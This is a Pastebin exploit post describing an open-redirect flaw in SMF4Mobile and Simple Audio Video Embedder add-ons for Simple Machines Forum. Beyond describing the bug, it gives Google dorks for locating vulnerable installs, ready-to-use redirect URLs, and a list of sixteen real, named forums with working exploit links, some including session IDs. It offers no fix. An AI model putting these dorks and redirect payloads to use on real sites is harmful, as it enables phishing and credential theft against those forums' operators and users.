Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################
- # Exploit Title : SMF 2.0.15 SMF4Mobile 1.1.5/1.2 SMF-Media Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 02/03/2019
- # Vendor Homepage : simplemachines.org ~ smfhacks.com
- # Software Download Links : download.simplemachines.org/index.php?archive
- smfhacks.com/index.php?topic=9521.0
- smfhacks.com/hacks/Simple-Audio-Video-Embedder.html
- custom.simplemachines.org/mods/index.php?mod=2681
- # Software Information Link : simplemachines.org/community/index.php?topic=395039.0
- smfhacks.com/hacks/Simple-Audio-Video-Embedder.html
- # Software Affected Versions : SMF4Mobile 1.2 and 1.1.5 © SMF-Media.com
- Simple Audio Video Embedder 4.1.4 - 4.5.3a - and previous versions with SMF 2.0.x and SMF 1.1.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : redirect intext:SMF4Mobile 1.1.5 © SMF-Media.com
- intext:intext:SMF4Mobile 1.2 © SMF-Media.com
- intext:SMF 2.0.15 Simple Audio Video Embedder
- intext:SMF 2.0.15 | SMF © 2017, Simple Machines - SimplePortal 2.3.6 © 2008-2014, SimplePortal
- /index.php?PHPSESSID=intext:SMF4Mobile 1.1.5 © SMF-Media.com
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ##################################################################################
- # Description about Software :
- ***************************
- An auto embed media modification for SMF that takes links for popular
- video websites and adds a player directly into the post or bbc area of your website.
- Works with both SMF 2.0.x and SMF 1.1.x
- ##################################################################################
- # Impact :
- **********
- This web application SMF 2.0.15 SMF4Mobile 1.1.5/1.2 SMF-Media accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value
- to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
- Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page
- user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ##################################################################################
- # Open Redirection Exploit :
- *************************
- /index.php?thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- /forum/index.php?thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- /forum/smf/index.php?thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- /forumv3/index.php?thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- /forum/index.php?PHPSESSID=8vf7jkk2u83e440810o5mmbsl1&thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- /index.php?PHPSESSID=82c041fca805ab6f15ade5f39fb1e3b1&thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- /index.php?PHPSESSID=d91c55043e5b3c136e6c0750f3dfd20e&thememode=mobile;redirect=https://www.[REDIRECTION-ADDRESS].gov
- ##################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] forum.nasaspaceflight.com/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] ridgestyle.com/forum/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] cornerofberkshireandfairfax.ca/forum/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] raumfahrer.net/forum/smf/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] heroesandvillains.info/forumv3/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] golfgtiforum.co.uk/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] upsolute.com/forum/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] forum.fanfooty.com.au/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] marioboards.com/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] bul-mamma.com/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] himalayastudios.com/forum/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] raceny.com/smf2/index.php?thememode=mobile;redirect=https://cxsecurity.com/
- [+] saabsportugal.com/forum/index.php?PHPSESSID=8vf7jkk2u83e440810o5mmbsl1&thememode=mobile;redirect=https://cxsecurity.com/
- [+] linuxmintusers.de/index.php?PHPSESSID=8vf7jkk2u83e440810o5mmbsl1&thememode=mobile;redirect=https://cxsecurity.com/
- [+] csramotorsports.com/index.php?PHPSESSID=82c041fca805ab6f15ade5f39fb1e3b1&thememode=mobile;redirect=https://cxsecurity.com/
- [+] legendchimes.com/index.php?PHPSESSID=d91c55043e5b3c136e6c0750f3dfd20e&thememode=mobile;redirect=https://cxsecurity.com/
- ##################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement